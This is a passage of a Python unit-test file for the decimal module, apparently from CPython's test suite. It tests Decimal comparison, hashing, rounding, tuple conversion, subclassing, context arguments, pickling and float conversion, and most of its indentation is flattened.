class CThreadingTest(ThreadingTest):
decimal = C
@unittest.skipUnless(threading, 'threading required')
class PyThreadingTest(ThreadingTest):
decimal = P
class UsabilityTest(unittest.TestCase):
'''Unit tests for Usability cases of Decimal.'''
def test_comparison_operators(self):
Decimal = self.decimal.Decimal
da = Decimal('23.42')
db = Decimal('23.42')
dc = Decimal('45')
#two Decimals
self.assertGreater(dc, da)
self.assertGreaterEqual(dc, da)
self.assertLess(da, dc)
self.assertLessEqual(da, dc)
self.assertEqual(da, db)
self.assertNotEqual(da, dc)
self.assertLessEqual(da, db)
self.assertGreaterEqual(da, db)
#a Decimal and an int
self.assertGreater(dc, 23)
self.assertLess(23, dc)
self.assertEqual(dc, 45)
        #a Decimal and an uncomparable object
self.assertNotEqual(da, 'ugly')
self.assertNotEqual(da, 32.7)
self.assertNotEqual(da, object())
self.assertNotEqual(da, object)
# sortable
a = list(map(Decimal, range(100)))
b = a[:]
random.shuffle(a)
a.sort()
self.assertEqual(a, b)
def test_decimal_float_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertLess(da, 3.0)
self.assertLessEqual(da, 3.0)
self.assertGreater(db, 0.25)
self.assertGreaterEqual(db, 0.25)
self.assertNotEqual(da, 1.5)
self.assertEqual(da, 0.25)
self.assertGreater(3.0, da)
self.assertGreaterEqual(3.0, da)
self.assertLess(0.25, db)
self.assertLessEqual(0.25, db)
self.assertNotEqual(0.25, db)
self.assertEqual(3.0, db)
self.assertNotEqual(0.1, Decimal('0.1'))
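    # A minimal illustrative sketch (not collected by unittest): mixed
    # Decimal/float comparisons use the exact mathematical values, so a
    # decimal literal and its float lookalike are usually unequal.
    def _sketch_float_comparison(self):
        from decimal import Decimal
        assert Decimal('0.25') == 0.25    # 0.25 is exact in binary
        assert Decimal('0.1') != 0.1      # the float is only an approximation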
def test_decimal_complex_comparison(self):
Decimal = self.decimal.Decimal
da = Decimal('0.25')
db = Decimal('3.0')
self.assertNotEqual(da, (1.5+0j))
self.assertNotEqual((1.5+0j), da)
self.assertEqual(da, (0.25+0j))
self.assertEqual((0.25+0j), da)
self.assertEqual((3.0+0j), db)
self.assertEqual(db, (3.0+0j))
self.assertNotEqual(db, (3.0+1j))
self.assertNotEqual((3.0+1j), db)
self.assertIs(db.__lt__(3.0+0j), NotImplemented)
self.assertIs(db.__le__(3.0+0j), NotImplemented)
self.assertIs(db.__gt__(3.0+0j), NotImplemented)
        self.assertIs(db.__ge__(3.0+0j), NotImplemented)
def test_decimal_fraction_comparison(self):
D = self.decimal.Decimal
F = fractions[self.decimal].Fraction
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
emax = C.MAX_EMAX if C else 999999999
emin = C.MIN_EMIN if C else -999999999
etiny = C.MIN_ETINY if C else -1999999997
c = Context(Emax=emax, Emin=emin)
with localcontext(c):
c.prec = emax
self.assertLess(D(0), F(1,9999999999999999999999999999999999999))
self.assertLess(F(-1,9999999999999999999999999999999999999), D(0))
self.assertLess(F(0,1), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,1))
self.assertLess(F(0,9999999999999999999999999), D("1e" + str(etiny)))
self.assertLess(D("-1e" + str(etiny)), F(0,9999999999999999999999999))
self.assertEqual(D("0.1"), F(1,10))
self.assertEqual(F(1,10), D("0.1"))
c.prec = 300
self.assertNotEqual(D(1)/3, F(1,3))
self.assertNotEqual(F(1,3), D(1)/3)
self.assertLessEqual(F(120984237, 9999999999), D("9e" + str(emax)))
self.assertGreaterEqual(D("9e" + str(emax)), F(120984237, 9999999999))
self.assertGreater(D('inf'), F(99999999999,123))
self.assertGreater(D('inf'), F(-99999999999,123))
self.assertLess(D('-inf'), F(99999999999,123))
self.assertLess(D('-inf'), F(-99999999999,123))
self.assertRaises(InvalidOperation, D('nan').__gt__, F(-9,123))
self.assertIs(NotImplemented, F(-9,123).__lt__(D('nan')))
self.assertNotEqual(D('nan'), F(-9,123))
self.assertNotEqual(F(-9,123), D('nan'))
def test_copy_and_deepcopy_methods(self):
Decimal = self.decimal.Decimal
d = Decimal('43.24')
c = copy.copy(d)
self.assertEqual(id(c), id(d))
dc = copy.deepcopy(d)
self.assertEqual(id(dc), id(d))
def test_hash_method(self):
Decimal = self.decimal.Decimal
localcontext = self.decimal.localcontext
def hashit(d):
a = hash(d)
b = d.__hash__()
self.assertEqual(a, b)
return a
#just that it's hashable
hashit(Decimal(23))
hashit(Decimal('Infinity'))
hashit(Decimal('-Infinity'))
hashit(Decimal('nan123'))
hashit(Decimal('-NaN'))
test_values = [Decimal(sign*(2**m + n))
for m in [0, 14, 15, 16, 17, 30, 31,
32, 33, 61, 62, 63, 64, 65, 66]
for n in range(-10, 10)
for sign in [-1, 1]]
test_values.extend([
Decimal("-1"), # ==> -2
Decimal("-0"), # zeros
Decimal("0.00"),
Decimal("-0.000"),
Decimal("0E10"),
Decimal("-0E12"),
Decimal("10.0"), # negative exponent
Decimal("-23.00000"),
Decimal("1230E100"), # positive exponent
Decimal("-4.5678E50"),
# a value for which hash(n) != hash(n % (2**64-1))
# in Python pre-2.6
Decimal(2**64 + 2**32 - 1),
# selection of values which fail with the old (before
# version 2.6) long.__hash__
Decimal("1.634E100"),
Decimal("90.697E100"),
Decimal("188.83E100"),
Decimal("1652.9E100"),
Decimal("56531E100"),
])
# check that hash(d) == hash(int(d)) for integral values
for value in test_values:
self.assertEqual(hashit(value), hashit(int(value)))
        # the same hash as the equal int
self.assertEqual(hashit(Decimal(23)), hashit(23))
self.assertRaises(TypeError, hash, Decimal('sNaN'))
self.assertTrue(hashit(Decimal('Inf')))
self.assertTrue(hashit(Decimal('-Inf')))
        # check that the hashes of a Decimal and a float match when they
        # represent exactly the same values
test_strings = ['inf', '-Inf', '0.0', '-.0e1',
'34.0', '2.5', '112390.625', '-0.515625']
for s in test_strings:
f = float(s)
d = Decimal(s)
self.assertEqual(hashit(f), hashit(d))
with localcontext() as c:
# check that the value of the hash doesn't depend on the
# current context (issue #1757)
x = Decimal("123456789.1")
c.prec = 6
h1 = hashit(x)
c.prec = 10
h2 = hashit(x)
c.prec = 16
h3 = hashit(x)
self.assertEqual(h1, h2)
self.assertEqual(h1, h3)
c.prec = 10000
x = 1100 ** 1248
self.assertEqual(hashit(Decimal(x)), hashit(x))
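    # A minimal illustrative sketch (not collected by unittest): equal
    # numbers hash equal across numeric types, and hashing ignores the
    # current precision.
    def _sketch_hash_invariants(self):
        from decimal import Decimal, localcontext
        assert hash(Decimal(23)) == hash(23)
        assert hash(Decimal('2.5')) == hash(2.5)
        with localcontext() as ctx:
            x = Decimal('123456789.1')
            ctx.prec = 6
            h = hash(x)
            ctx.prec = 28
            assert hash(x) == h           # independent of ctx.prec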
def test_min_and_max_methods(self):
Decimal = self.decimal.Decimal
d1 = Decimal('15.32')
d2 = Decimal('28.5')
l1 = 15
l2 = 28
#between Decimals
self.assertIs(min(d1,d2), d1)
self.assertIs(min(d2,d1), d1)
self.assertIs(max(d1,d2), d2)
self.assertIs(max(d2,d1), d2)
#between Decimal and int
self.assertIs(min(d1,l2), d1)
self.assertIs(min(l2,d1), d1)
self.assertIs(max(l1,d2), d2)
self.assertIs(max(d2,l1), d2)
def test_as_nonzero(self):
Decimal = self.decimal.Decimal
#as false
self.assertFalse(Decimal(0))
#as true
self.assertTrue(Decimal('0.372'))
def test_tostring_methods(self):
#Test str and repr methods.
Decimal = self.decimal.Decimal
d = Decimal('15.32')
self.assertEqual(str(d), '15.32') # str
self.assertEqual(repr(d), "Decimal('15.32')") # repr
def test_tonum_methods(self):
#Test float and int methods.
Decimal = self.decimal.Decimal
d1 = Decimal('66')
d2 = Decimal('15.32')
#int
self.assertEqual(int(d1), 66)
self.assertEqual(int(d2), 15)
#float
self.assertEqual(float(d1), 66)
self.assertEqual(float(d2), 15.32)
#floor
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 3),
('3.899', 3),
('-2.3', -3),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812736),
]
for d, i in test_pairs:
self.assertEqual(math.floor(Decimal(d)), i)
self.assertRaises(ValueError, math.floor, Decimal('-NaN'))
self.assertRaises(ValueError, math.floor, Decimal('sNaN'))
self.assertRaises(ValueError, math.floor, Decimal('NaN123'))
self.assertRaises(OverflowError, math.floor, Decimal('Inf'))
self.assertRaises(OverflowError, math.floor, Decimal('-Inf'))
#ceiling
test_pairs = [
('123.00', 123),
('3.2', 4),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('89891211712379812736.1', 89891211712379812737),
]
for d, i in test_pairs:
self.assertEqual(math.ceil(Decimal(d)), i)
self.assertRaises(ValueError, math.ceil, Decimal('-NaN'))
self.assertRaises(ValueError, math.ceil, Decimal('sNaN'))
self.assertRaises(ValueError, math.ceil, Decimal('NaN123'))
self.assertRaises(OverflowError, math.ceil, Decimal('Inf'))
self.assertRaises(OverflowError, math.ceil, Decimal('-Inf'))
#round, single argument
test_pairs = [
('123.00', 123),
('3.2', 3),
('3.54', 4),
('3.899', 4),
('-2.3', -2),
('-11.0', -11),
('0.0', 0),
('-0E3', 0),
('-3.5', -4),
('-2.5', -2),
('-1.5', -2),
('-0.5', 0),
('0.5', 0),
('1.5', 2),
('2.5', 2),
('3.5', 4),
]
for d, i in test_pairs:
self.assertEqual(round(Decimal(d)), i)
self.assertRaises(ValueError, round, Decimal('-NaN'))
self.assertRaises(ValueError, round, Decimal('sNaN'))
self.assertRaises(ValueError, round, Decimal('NaN123'))
self.assertRaises(OverflowError, round, Decimal('Inf'))
self.assertRaises(OverflowError, round, Decimal('-Inf'))
#round, two arguments; this is essentially equivalent
#to quantize, which is already extensively tested
test_triples = [
('123.456', -4, '0E+4'),
('123.456', -3, '0E+3'),
('123.456', -2, '1E+2'),
('123.456', -1, '1.2E+2'),
('123.456', 0, '123'),
('123.456', 1, '123.5'),
('123.456', 2, '123.46'),
('123.456', 3, '123.456'),
('123.456', 4, '123.4560'),
('123.455', 2, '123.46'),
('123.445', 2, '123.44'),
('Inf', 4, 'NaN'),
('-Inf', -23, 'NaN'),
('sNaN314', 3, 'NaN314'),
]
for d, n, r in test_triples:
self.assertEqual(str(round(Decimal(d), n)), r)
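    # A minimal illustrative sketch (not collected by unittest): round()
    # on a Decimal uses round-half-even, and math.floor/math.ceil work
    # through __floor__/__ceil__.
    def _sketch_rounding(self):
        import math
        from decimal import Decimal
        assert round(Decimal('2.5')) == 2                # tie goes to even
        assert round(Decimal('3.5')) == 4
        assert round(Decimal('123.456'), 2) == Decimal('123.46')
        assert math.floor(Decimal('-2.3')) == -3
        assert math.ceil(Decimal('-2.3')) == -2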
def test_nan_to_float(self):
# Test conversions of decimal NANs to float.
# See http://bugs.python.org/issue15544
Decimal = self.decimal.Decimal
for s in ('nan', 'nan1234', '-nan', '-nan2468'):
f = float(Decimal(s))
self.assertTrue(math.isnan(f))
sign = math.copysign(1.0, f)
self.assertEqual(sign, -1.0 if s.startswith('-') else 1.0)
def test_snan_to_float(self):
Decimal = self.decimal.Decimal
for s in ('snan', '-snan', 'snan1357', '-snan1234'):
d = Decimal(s)
self.assertRaises(ValueError, float, d)
def test_eval_round_trip(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal( (0, (0,), 0) )
self.assertEqual(d, eval(repr(d)))
#int
d = Decimal( (1, (4, 5), 0) )
self.assertEqual(d, eval(repr(d)))
#float
d = Decimal( (0, (4, 5, 3, 4), -2) )
self.assertEqual(d, eval(repr(d)))
#weird
d = Decimal( (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
self.assertEqual(d, eval(repr(d)))
def test_as_tuple(self):
Decimal = self.decimal.Decimal
#with zero
d = Decimal(0)
self.assertEqual(d.as_tuple(), (0, (0,), 0) )
#int
d = Decimal(-45)
self.assertEqual(d.as_tuple(), (1, (4, 5), 0) )
#complicated string
d = Decimal("-4.34913534E-17")
self.assertEqual(d.as_tuple(), (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25) )
# The '0' coefficient is implementation specific to decimal.py.
# It has no meaning in the C-version and is ignored there.
d = Decimal("Infinity")
self.assertEqual(d.as_tuple(), (0, (0,), 'F') )
#leading zeros in coefficient should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), -2) )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), -2) )
d = Decimal( (1, (0, 0, 0), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
d = Decimal( (1, (), 37) )
self.assertEqual(d.as_tuple(), (1, (0,), 37))
#leading zeros in NaN diagnostic info should be stripped
d = Decimal( (0, (0, 0, 4, 0, 5, 3, 4), 'n') )
self.assertEqual(d.as_tuple(), (0, (4, 0, 5, 3, 4), 'n') )
d = Decimal( (1, (0, 0, 0), 'N') )
self.assertEqual(d.as_tuple(), (1, (), 'N') )
d = Decimal( (1, (), 'n') )
self.assertEqual(d.as_tuple(), (1, (), 'n') )
# For infinities, decimal.py has always silently accepted any
# coefficient tuple.
d = Decimal( (0, (0,), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (0, (4, 5, 3, 4), 'F') )
self.assertEqual(d.as_tuple(), (0, (0,), 'F'))
d = Decimal( (1, (0, 2, 7, 1), 'F') )
self.assertEqual(d.as_tuple(), (1, (0,), 'F'))
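    # A minimal illustrative sketch (not collected by unittest): as_tuple()
    # returns the (sign, digits, exponent) triple, and the constructor
    # accepts it back, so the representation round-trips.
    def _sketch_as_tuple(self):
        from decimal import Decimal
        d = Decimal('-4.34913534E-17')
        t = d.as_tuple()
        assert t == (1, (4, 3, 4, 9, 1, 3, 5, 3, 4), -25)
        assert Decimal(t) == d            # round trip through the tuple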
def test_subclassing(self):
# Different behaviours when subclassing Decimal
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
y = None
d1 = MyDecimal(1)
d2 = MyDecimal(2)
d = d1 + d2
self.assertIs(type(d), Decimal)
d = d1.max(d2)
self.assertIs(type(d), Decimal)
d = copy.copy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
d = copy.deepcopy(d1)
self.assertIs(type(d), MyDecimal)
self.assertEqual(d, d1)
# Decimal(Decimal)
d = Decimal('1.0')
x = Decimal(d)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(Decimal)
m = MyDecimal(d)
self.assertIs(type(m), MyDecimal)
self.assertEqual(m, d)
self.assertIs(m.y, None)
# Decimal(MyDecimal)
x = Decimal(m)
self.assertIs(type(x), Decimal)
self.assertEqual(x, d)
# MyDecimal(MyDecimal)
m.y = 9
x = MyDecimal(m)
self.assertIs(type(x), MyDecimal)
self.assertEqual(x, d)
self.assertIs(x.y, None)
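    # A minimal illustrative sketch (not collected by unittest): arithmetic
    # on a hypothetical Decimal subclass yields plain Decimal, while
    # copy.copy preserves the subclass.
    def _sketch_subclassing(self):
        import copy
        from decimal import Decimal
        class Tagged(Decimal):            # hypothetical subclass
            pass
        d = Tagged('1.5')
        assert type(d + d) is Decimal
        assert type(copy.copy(d)) is Tagged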
def test_implicit_context(self):
Decimal = self.decimal.Decimal
getcontext = self.decimal.getcontext
# Check results when context given implicitly. (Issue 2478)
c = getcontext()
self.assertEqual(str(Decimal(0).sqrt()),
str(c.sqrt(Decimal(0))))
def test_none_args(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
localcontext = self.decimal.localcontext
InvalidOperation = self.decimal.InvalidOperation
DivisionByZero = self.decimal.DivisionByZero
Overflow = self.decimal.Overflow
Underflow = self.decimal.Underflow
Subnormal = self.decimal.Subnormal
Inexact = self.decimal.Inexact
Rounded = self.decimal.Rounded
Clamped = self.decimal.Clamped
with localcontext(Context()) as c:
c.prec = 7
c.Emax = 999
c.Emin = -999
x = Decimal("111")
y = Decimal("1e9999")
z = Decimal("1e-9999")
##### Unary functions
c.clear_flags()
self.assertEqual(str(x.exp(context=None)), '1.609487E+48')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(Overflow, y.exp, context=None)
self.assertTrue(c.flags[Overflow])
self.assertIs(z.is_normal(context=None), False)
self.assertIs(z.is_subnormal(context=None), True)
c.clear_flags()
self.assertEqual(str(x.ln(context=None)), '4.709530')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).ln, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.log10(context=None)), '2.045323')
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal(-1).log10, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(x.logb(context=None)), '2')
self.assertRaises(DivisionByZero, Decimal(0).logb, context=None)
self.assertTrue(c.flags[DivisionByZero])
c.clear_flags()
self.assertEqual(str(x.logical_invert(context=None)), '1111000')
self.assertRaises(InvalidOperation, y.logical_invert, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_minus(context=None)), '9.999999E+999')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_minus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(y.next_plus(context=None)), 'Infinity')
self.assertRaises(InvalidOperation, Decimal('sNaN').next_plus, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
self.assertEqual(str(z.normalize(context=None)), '0')
self.assertRaises(Overflow, y.normalize, context=None)
self.assertTrue(c.flags[Overflow])
self.assertEqual(str(z.number_class(context=None)), '+Subnormal')
c.clear_flags()
self.assertEqual(str(z.sqrt(context=None)), '0E-1005')
self.assertTrue(c.flags[Clamped])
self.assertTrue(c.flags[Inexact])
self.assertTrue(c.flags[Rounded])
self.assertTrue(c.flags[Subnormal])
self.assertTrue(c.flags[Underflow])
c.clear_flags()
self.assertRaises(Overflow, y.sqrt, context=None)
self.assertTrue(c.flags[Overflow])
c.capitals = 0
self.assertEqual(str(z.to_eng_string(context=None)), '1e-9999')
c.capitals = 1
##### Binary functions
c.clear_flags()
ans = str(x.compare(Decimal('Nan891287828'), context=None))
self.assertEqual(ans, 'NaN1287828')
self.assertRaises(InvalidOperation, x.compare, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.compare_signal(8224, context=None))
self.assertEqual(ans, '-1')
self.assertRaises(InvalidOperation, x.compare_signal, Decimal('NaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_and(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.logical_and, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_or(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.logical_or, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.logical_xor(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, x.logical_xor, 123, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.max_mag(101, context=None))
self.assertEqual(ans, '111')
self.assertRaises(InvalidOperation, x.max_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.min_mag(101, context=None))
self.assertEqual(ans, '101')
self.assertRaises(InvalidOperation, x.min_mag, Decimal('sNaN'), context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.remainder_near(101, context=None))
self.assertEqual(ans, '10')
self.assertRaises(InvalidOperation, y.remainder_near, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.rotate(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.rotate, 101, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.scaleb(7, context=None))
self.assertEqual(ans, '1.11E+9')
self.assertRaises(InvalidOperation, x.scaleb, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.clear_flags()
ans = str(x.shift(2, context=None))
self.assertEqual(ans, '11100')
self.assertRaises(InvalidOperation, x.shift, 10000, context=None)
self.assertTrue(c.flags[InvalidOperation])
##### Ternary functions
c.clear_flags()
ans = str(x.fma(2, 3, context=None))
self.assertEqual(ans, '225')
self.assertRaises(Overflow, x.fma, Decimal('1e9999'), 3, context=None)
self.assertTrue(c.flags[Overflow])
##### Special cases
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_value(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_value(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_value, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_HALF_EVEN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '2')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.5').to_integral_exact(rounding=None, context=None))
self.assertEqual(ans, '1')
ans = str(Decimal('1.5').to_integral_exact(rounding=ROUND_UP, context=None))
self.assertEqual(ans, '2')
c.clear_flags()
self.assertRaises(InvalidOperation, Decimal('sNaN').to_integral_exact, context=None)
self.assertTrue(c.flags[InvalidOperation])
c.rounding = ROUND_UP
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.501')
c.rounding = ROUND_DOWN
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=None, context=None))
self.assertEqual(ans, '1.500')
ans = str(Decimal('1.50001').quantize(exp=Decimal('1e-3'), rounding=ROUND_UP, context=None))
self.assertEqual(ans, '1.501')
c.clear_flags()
self.assertRaises(InvalidOperation, y.quantize, Decimal('1e-10'), rounding=ROUND_UP, context=None)
self.assertTrue(c.flags[InvalidOperation])
with localcontext(Context()) as context:
context.prec = 7
context.Emax = 999
context.Emin = -999
with localcontext(ctx=None) as c:
self.assertEqual(c.prec, 7)
self.assertEqual(c.Emax, 999)
self.assertEqual(c.Emin, -999)
def test_conversions_from_int(self):
# Check that methods taking a second Decimal argument will
# always accept an integer in place of a Decimal.
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(4).compare(3),
Decimal(4).compare(Decimal(3)))
self.assertEqual(Decimal(4).compare_signal(3),
Decimal(4).compare_signal(Decimal(3)))
self.assertEqual(Decimal(4).compare_total(3),
Decimal(4).compare_total(Decimal(3)))
self.assertEqual(Decimal(4).compare_total_mag(3),
Decimal(4).compare_total_mag(Decimal(3)))
self.assertEqual(Decimal(10101).logical_and(1001),
Decimal(10101).logical_and(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_or(1001),
Decimal(10101).logical_or(Decimal(1001)))
self.assertEqual(Decimal(10101).logical_xor(1001),
Decimal(10101).logical_xor(Decimal(1001)))
self.assertEqual(Decimal(567).max(123),
Decimal(567).max(Decimal(123)))
self.assertEqual(Decimal(567).max_mag(123),
Decimal(567).max_mag(Decimal(123)))
self.assertEqual(Decimal(567).min(123),
Decimal(567).min(Decimal(123)))
self.assertEqual(Decimal(567).min_mag(123),
Decimal(567).min_mag(Decimal(123)))
self.assertEqual(Decimal(567).next_toward(123),
Decimal(567).next_toward(Decimal(123)))
self.assertEqual(Decimal(1234).quantize(100),
Decimal(1234).quantize(Decimal(100)))
self.assertEqual(Decimal(768).remainder_near(1234),
Decimal(768).remainder_near(Decimal(1234)))
self.assertEqual(Decimal(123).rotate(1),
Decimal(123).rotate(Decimal(1)))
self.assertEqual(Decimal(1234).same_quantum(1000),
Decimal(1234).same_quantum(Decimal(1000)))
self.assertEqual(Decimal('9.123').scaleb(-100),
Decimal('9.123').scaleb(Decimal(-100)))
self.assertEqual(Decimal(456).shift(-1),
Decimal(456).shift(Decimal(-1)))
self.assertEqual(Decimal(-12).fma(Decimal(45), 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, 67),
Decimal(-12).fma(Decimal(45), Decimal(67)))
self.assertEqual(Decimal(-12).fma(45, Decimal(67)),
Decimal(-12).fma(Decimal(45), Decimal(67)))
class CUsabilityTest(UsabilityTest):
decimal = C
class PyUsabilityTest(UsabilityTest):
decimal = P
class PythonAPItests(unittest.TestCase):
def test_abc(self):
Decimal = self.decimal.Decimal
self.assertTrue(issubclass(Decimal, numbers.Number))
self.assertFalse(issubclass(Decimal, numbers.Real))
self.assertIsInstance(Decimal(0), numbers.Number)
self.assertNotIsInstance(Decimal(0), numbers.Real)
def test_pickle(self):
Decimal = self.decimal.Decimal
savedecimal = sys.modules['decimal']
# Round trip
sys.modules['decimal'] = self.decimal
d = Decimal('-3.141590000')
p = pickle.dumps(d)
e = pickle.loads(p)
self.assertEqual(d, e)
if C:
# Test interchangeability
x = C.Decimal('-3.123e81723')
y = P.Decimal('-3.123e81723')
sys.modules['decimal'] = C
sx = pickle.dumps(x)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.Decimal)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.Decimal)
self.assertEqual(r, x)
x = C.Decimal('-3.123e81723').as_tuple()
y = P.Decimal('-3.123e81723').as_tuple()
sys.modules['decimal'] = C
sx = pickle.dumps(x)
sys.modules['decimal'] = P
r = pickle.loads(sx)
self.assertIsInstance(r, P.DecimalTuple)
self.assertEqual(r, y)
sys.modules['decimal'] = P
sy = pickle.dumps(y)
sys.modules['decimal'] = C
r = pickle.loads(sy)
self.assertIsInstance(r, C.DecimalTuple)
self.assertEqual(r, x)
sys.modules['decimal'] = savedecimal
def test_int(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(int(d)), r)
self.assertRaises(ValueError, int, Decimal('-nan'))
self.assertRaises(ValueError, int, Decimal('snan'))
self.assertRaises(OverflowError, int, Decimal('inf'))
self.assertRaises(OverflowError, int, Decimal('-inf'))
def test_trunc(self):
Decimal = self.decimal.Decimal
for x in range(-250, 250):
s = '%0.2f' % (x / 100.0)
# should work the same as for floats
self.assertEqual(int(Decimal(s)), int(float(s)))
# should work the same as to_integral in the ROUND_DOWN mode
d = Decimal(s)
r = d.to_integral(ROUND_DOWN)
self.assertEqual(Decimal(math.trunc(d)), r)
def test_from_float(self):
Decimal = self.decimal.Decimal
class MyDecimal(Decimal):
pass
self.assertTrue(issubclass(MyDecimal, Decimal))
r = MyDecimal.from_float(0.1)
self.assertEqual(type(r), MyDecimal)
self.assertEqual(str(r),
'0.1000000000000000055511151231257827021181583404541015625')
bigint = 12345678901234567890123456789
self.assertEqual(MyDecimal.from_float(bigint), MyDecimal(bigint))
self.assertTrue(MyDecimal.from_float(float('nan')).is_qnan())
self.assertTrue(MyDecimal.from_float(float('inf')).is_infinite())
self.assertTrue(MyDecimal.from_float(float('-inf')).is_infinite())
self.assertEqual(str(MyDecimal.from_float(float('nan'))),
str(Decimal('NaN')))
self.assertEqual(str(MyDecimal.from_float(float('inf'))),
str(Decimal('Infinity')))
self.assertEqual(str(MyDecimal.from_float(float('-inf'))),
str(Decimal('-Infinity')))
self.assertRaises(TypeError, MyDecimal.from_float, 'abc')
for i in range(200):
x = random.expovariate(0.01) * (random.random() * 2.0 - 1.0)
self.assertEqual(x, float(MyDecimal.from_float(x))) # roundtrip
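    # A minimal illustrative sketch (not collected by unittest):
    # Decimal.from_float is exact, exposing the full binary expansion of
    # the float, and the conversion round-trips back to the same float.
    def _sketch_from_float(self):
        from decimal import Decimal
        d = Decimal.from_float(0.1)
        assert str(d) == ('0.1000000000000000055511151231257827'
                          '021181583404541015625')
        assert float(d) == 0.1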
def test_create_decimal_from_float(self):
Decimal = self.decimal.Decimal
Context = self.decimal.Context
Inexact = self.decimal.Inexact
context = Context(prec=5, rounding=ROUND_DOWN)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1415')
)
context = Context(prec=5, rounding=ROUND_UP)
self.assertEqual(
context.create_decimal_from_float(math.pi),
Decimal('3.1416')
)
context = Context(prec=5, traps=[Inexact])
self.assertRaises(
Inexact,
